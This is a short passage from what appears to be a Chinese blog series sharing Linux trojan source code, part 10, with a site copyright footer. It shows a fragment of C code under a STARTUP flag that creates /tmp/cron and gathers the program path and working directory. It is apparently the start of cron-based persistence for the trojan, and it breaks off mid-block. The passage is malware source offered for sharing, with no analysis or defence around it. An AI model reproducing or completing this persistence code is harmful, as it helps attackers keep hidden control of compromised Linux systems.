#ifdef STARTUP
str="/tmp/cron";
file=fopen(str,"r");
if (file == NULL) {
system("touch /tmp/cron");
sleep(1);
file=fopen(str,"r");
}
if (file != NULL) {
char outfile[256], buf[1024],cron[1024],tmp[1024];
int i=strlen(argv[0]), d=0;
getcwd(cwd,256);
Linux 下一木马程序分享(10)
内容版权声明:除非注明,否则皆为本站原创文章。
转载注明出处:http://127.0.0.1/wyyszz.html